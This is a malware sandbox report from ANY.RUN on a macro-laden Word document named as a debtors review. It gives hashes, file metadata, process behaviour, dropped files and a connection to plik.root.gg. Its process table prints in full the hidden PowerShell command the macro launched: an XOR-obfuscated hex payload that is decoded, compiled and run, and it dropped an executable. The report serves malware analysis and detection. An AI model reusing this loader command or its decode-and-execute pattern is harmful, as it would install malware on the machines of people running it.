analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Debtors Review as on 7.18.2019 .doc

Full analysis: https://app.any.run/tasks/e6c1265b-355c-4a71-a07e-758a45f80adb
Verdict: Malicious activity
Analysis date: July 18, 2019, 13:38:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
maldoc-32
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Title: o1e44, Subject: p1f21b, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Jul 18 08:56:00 2019, Last Saved Time/Date: Thu Jul 18 08:56:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

A5E3811303D8494345734C921B6BC2C9

SHA1:

5C3195F3A9E045DB61531A248477CFF0F0405334

SHA256:

2948787E6709CD5322648262F1E2CB1BB1E4BC921CDCDF81EA759ABA4E552034

SSDEEP:

12288:hDDH2JexyhrAopDEPoqVM22rqxMaA58ewbrH2JexMhrAoTDEPoqC:JbcemAou/zAqOaA58eezcekAos/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • a94afc.exe (PID: 2140)
    • Starts Visual C# compiler

      • powershell.exe (PID: 2908)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2908)
    • Creates files in the user directory

      • powershell.exe (PID: 2908)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2908)
    • Executed via WMI

      • powershell.exe (PID: 2908)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3164)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2908)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3164)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: o1e44
Subject: p1f21b
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:07:18 07:56:00
ModifyDate: 2019:07:18 07:56:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Latin 1 (Western European)
Bytes: 11000
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: o1e44
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
5
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe csc.exe cvtres.exe no specs a94afc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3164"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Debtors Review as on 7.18.2019 .doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2908powershell -WindowStyle Hidden function ac629 { param($ocbef) $a86a42 = 'l4c4a';$bcd45f1 = ''; for ($i = 0; $i -lt $ocbef.length; $i+=2) { $e4da3 = [convert]::ToByte($ocbef.Substring($i, 2), 16); $bcd45f1 += [char]($e4da3 -bxor $a86a42[($i / 2) % $a86a42.length]); } return $bcd45f1; } $qfc42cf = '19470a5a064c671a47150959584112055a041432154717510c4266165a150559061a28024006460e1c67064617055706475a19470a5a064c671a471509594d70080d530d5b12185d00475a19470a5a064c671a471509594d7d2e5741105d0f0b14304d1218510e1a2f094058396b1c410158080f140058001f474343540e52570d57176f27580d2559135b13181c415f041e5a0658525e164f710f18461a640e055a1709432b5117641303572250051e5110474345694344140e580a57411f400240080f14064c1509460d142802403340134c5a5606055b014b7d0f186417464107000656070f18104013055a04140d5d0d545750450f38700d007d0e440e1e404b160a09460d510d5f06411841295a1746183c5b0a5a154c0943162d03550778080e460246184e1d3e141119560f5d024c4717551505574351191851115a41255a1764151e141752050f0c571c1218460a5a064c59070c545f034a0f3a28580f7d0c1c5b1140494e5f06460f09585006434014265a151e4d335b0802405e163705461741000064115b1509571716483114134103005d0014121855175d024c511b40041e5a43560e0358434e535d565b1c2802403340134c42010d045806571834255a1764151e141451575a0c511841195d0d40411c5156010440140c41154c410a5a154c510751570f55021d5a37700f582801440c4615441628511302510f075342500f58434014265a151e4d335b0802405e163318582e5b17097906590e1e4d4118413f511778001f4026461303465e52000047061d3c4c4717551505574351191851115a411a5b0a50411f06570504447d0d40311846435a53090357074d255a1764151e140d0357590351180802404342030a075b0d00450f134103005d0014121855175d024c5d0d40411e525405505b1c4a4f2802403340134c415405530a564309411852075759581c0257575e0d4b165108015a0551595057525154015b04074e1d4a0f080a1c1603505e5201095c255a1764151e1a395113031d18530e185b434404550c00565a117d0d40311846435e02085507090f590607035444415405530a564f55025a065a1c435e50560d505c010707535c5256015108035505555c555606515a00551648450f0a5249065707550551092a5a153c40111a3b09460c1d1a0b5b175b411c515a0c020e0f1e612802403340134c465b07525b094b6128024033401345015841080240434e525d0550055c5c0f0a52494d4e510503541c0957050d504f46595f07541851140053180e1940434e525d05500548454f045b1503141351585457010f1c2e4d17513a31140956035e0d52091a5c4c50054d5c4c05524d5c4c5a041c577d0d4031184643565354515a5659517902461204550f1a2000580c57292b580c5600001c501d5a21551147090d584d770e1c4d4b5e030e065a054d5c18010659090d010c4d5f1d5847535805061c0f0943437d0f1864174649065707550542600c7d0f1802571c4847041b04515d564a18035e0c060d035418501d5a1c515a0c020e0e4363040e770f5d0402404352050855560c5c02511414360956205808095a171c48574717460802534358005a0056092402420a460e0259065a15427306402703580751133c55175c49295a155d13035a0e510f181a3044040f5d0258270358075113427513440d0557024008035a2755150d1d48163d30555a00000a57411f000f02510d494e005101505d56560543450f0550050d015b1a2503430d580e0d50255d0d091c0257575e0d4b1651580053055658005206545a050100025800535051590105000558025351515f0053000559075302555f01510400590c5300555f0456075059045202500e000006075b06510750090306055759075200515a02560002590153525309045604045c0450035058040006535a0152565159035a01505c505751505903500407590c5200520e0053015658575607535f045401525b055104555e015205035905411d4d0055550054450f33460e0f51104732185511402802520c14050e0357510708090d51164c64115b0209471067150d46177d0f0a5b4b58005a00561d5a3c460c57041f474d67150d46171c050e03575107081d5846041841115a415c0f1e44140e580a57411f400240080f14104013055a0414000f02510d491f40115d0f0b140d5553595750504817471746080253435f55095605575c4e585757550d165847151e5d0d534118520757595809304013055a041a240144174d5a0a5b111c080240435d5c5c0f0a080f0d06565752081a2f510f0b400b0f084709511d1a0e4d17514102015150565909205b0f1a5111404f385b214d15091c0d5553595750504f3f410147151e5d0d53490518511d4d5d024a0f150a50000c5547094b57090d464a1c0f59060703544c6a435f55095605573a445d4c06484c11435f55095605574f20510d531504694a0f1c1e5117411302141752050f0c570f1c11'; $qfc42cf2 = ac629($qfc42cf); Add-Type -TypeDefinition $qfc42cf2; [w5bf496]::rf7117(); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2180"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\xbvjcfny.cmdline"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.4927 (NetFXspW7.050727-4900)
3396C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDE3B.tmp" "c:\Users\admin\AppData\Local\Temp\CSCDE3A.tmp"C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.4940 (Win7SP1.050727-5400)
2140"C:\Users\admin\AppData\Roaming\a94afc.exe" C:\Users\admin\AppData\Roaming\a94afc.exepowershell.exe
User:
admin
Company:
El Matador
Integrity Level:
MEDIUM
Description:
snakeGameX
Version:
8.0.4.2
Total events
1 685
Read events
1 265
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
0
Unknown types
4

Dropped files

PID
Process
Filename
Type
3164WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD188.tmp.cvr
MD5:
SHA256:
2908powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9BNMX9ENYI0X8EPLPDG5.temp
MD5:
SHA256:
2908powershell.exeC:\Users\admin\AppData\Local\Temp\xbvjcfny.0.cs
MD5:
SHA256:
2908powershell.exeC:\Users\admin\AppData\Local\Temp\xbvjcfny.cmdline
MD5:
SHA256:
2180csc.exeC:\Users\admin\AppData\Local\Temp\CSCDE3A.tmp
MD5:
SHA256:
2180csc.exeC:\Users\admin\AppData\Local\Temp\xbvjcfny.pdb
MD5:
SHA256:
3396cvtres.exeC:\Users\admin\AppData\Local\Temp\RESDE3B.tmp
MD5:
SHA256:
2180csc.exeC:\Users\admin\AppData\Local\Temp\xbvjcfny.dll
MD5:
SHA256:
2180csc.exeC:\Users\admin\AppData\Local\Temp\xbvjcfny.out
MD5:
SHA256:
3164WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\133A09CA.emf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2908
powershell.exe
37.187.19.227:443
plik.root.gg
OVH SAS
FR
suspicious

DNS requests

Domain
IP
Reputation
plik.root.gg
  • 37.187.19.227
suspicious

Threats

No threats detected
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144